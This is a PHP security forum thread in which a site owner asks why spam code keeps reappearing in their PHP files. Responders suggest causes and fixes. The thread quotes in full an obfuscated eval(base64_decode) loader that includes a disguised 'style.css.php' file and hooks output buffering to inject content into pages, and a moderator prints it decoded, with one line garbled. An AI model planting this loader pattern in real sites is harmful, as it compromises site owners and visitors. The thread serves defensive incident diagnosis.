code added to my php files

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

code added to my php files

Post by fascript »

Hi we keep getting a spam code inserted somehow in to our php files , how do we stop it? we keep changing password etc in cpanel but so oftwen keep getting it ..i have just deleted it before i made the post so i cant add it but it has words like eval etc in it has anyone know of a remedy? thanks guys
Paul Arnold
Forum Contributor
Posts: 141
Joined: Fri Jun 13, 2008 10:09 am
Location: Newcastle Upon Tyne

Re: code added to my php files

Post by Paul Arnold »

You've probably got your permissions set too high.
Try setting them to 644.
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

Re: code added to my php files

Post by fascript »

Thanks but they are set at 644
User avatar
VladSun
DevNet Master
Posts: 4313
Joined: Wed Jun 27, 2007 9:44 am
Location: Sofia, Bulgaria

Re: code added to my php files

Post by VladSun »

Who's the owner (the system one ;) ) of these files?
There are 10 types of people in this world, those who understand binary and those who don't
User avatar
jaoudestudios
DevNet Resident
Posts: 1483
Joined: Wed Jun 18, 2008 8:32 am
Location: Surrey

Re: code added to my php files

Post by jaoudestudios »

fascript wrote:Hi we keep getting a spam code inserted somehow in to our php files
Is it definitely into your php files or into the database? and is being shown on your web pages?
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: code added to my php files

Post by kaisellgren »

Are you saying someone has modified (keeps modifying) your PHP files?
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

Re: code added to my php files

Post by fascript »

Hi yes its happened a couple of times, infact heres one i didnt clean out


<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9mcmVlYWMvcHVibGljX2h0bWwvZm9ydW1zL1RoZW1lcy9jbGFzc2ljL2ltYWdlcy90b3BpYy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvZnJlZWFjL3B1YmxpY19odG1sL2ZvcnVtcy9UaGVtZXMvY2xhc3NpYy9pbWFnZXMvdG9waWMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: code added to my php files

Post by kaisellgren »

Great... someone has cracked into your system pretty much. :P

It could be almost anything. FTP account exposed, vulnerable web server or a vulnerable application installed on your hosting account.

At this point I can only recommend you to update all software and remove all unnecessary software. Update all credentials (even FTP, etc) and then put your site back online. If this stops the modification of your files, then one or more applications that you updated was/were vulnerable to an attack.
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

Re: code added to my php files

Post by fascript »

Thanks guys for your comments, i did have someone decode it ,it looks like harmless spam .As soon as i delete it ,it comes back as if its knows lol
fascript
Forum Newbie
Posts: 5
Joined: Tue Jun 16, 2009 6:25 am

CODE

Post by fascript »

Is it definitely into your php files or into the database? and is being shown on your web pages?]
No nothing else is visible apart from what should be showing
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: code added to my php files

Post by Eric! »

Are your php scripts pulling data from anywhere? A database, other sites, etc?

Does it come back immediately even after changing all your account passwords?

You should also notify your host provider, someone sharing the system with you might have found a hole to access your file structure.
User avatar
onion2k
Jedi Mod
Posts: 5263
Joined: Tue Dec 21, 2004 5:03 pm
Location: usrlab.com

Re: code added to my php files

Post by onion2k »

It decodes to this..

Code: Select all

if (function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) { 
 
    $GLOBALS['sh_no'] = 1;
 
    if(file_exists('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php')) {
 
        include_once('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php');
        
        if(function_exists('gml')&&!function_exists('dgobh')) { 
            
            if(!function_exists('gzdecode')) { 
            
                function gzdecode($var2) { 
                
                    $var1 = ord(substr($var2,3,1));
                    $var3 = 10;
                    $var4 = 0;
 
                    if($var1&4) { 
 
                        $var4 = unpack('v', substr($var2,10,2));
                        $var4 = $var4[1];
                        $var3 += 2+$var4;
                    
                    }
                    
                    if($var1&8) { 
                    
                        $var3 = strpos($var2,chr(0),$var3)+1;
                    
                    }
                    
                    if($var1&16) { 
                    
                        $var3 = strpos($var2,chr(0),$var3)+1;
                        
                    }
                    
                    if($var1&2) { 
                    
                        $var3 += 2; 
                    
                    }
                    
                    $var5 = gzinflate(substr($var2,$var3));
                    
                    if($var5===FALSE) { 
                    
                        $var5 = $var2;
                        
                    } 
                    
                    return $var5;
                    
                }
 
            }
            
            function dgobh($var6) { 
            
                Header('Content-Encoding: none');
                
                $var7 = gzdecode($var6);
 
                if (preg_match('/\]*\>)/si','$1'.gml(),$var7);
                
                } else {
                
                return gml().$var7;
                
             }
             
        }
         
        ob_start('dgobh');
 
        }
    }
 
}
It's looking for some sort of forum software. If you're using some it's been compromised. Update it to the latest version, or better still, switch to something else.
Post Reply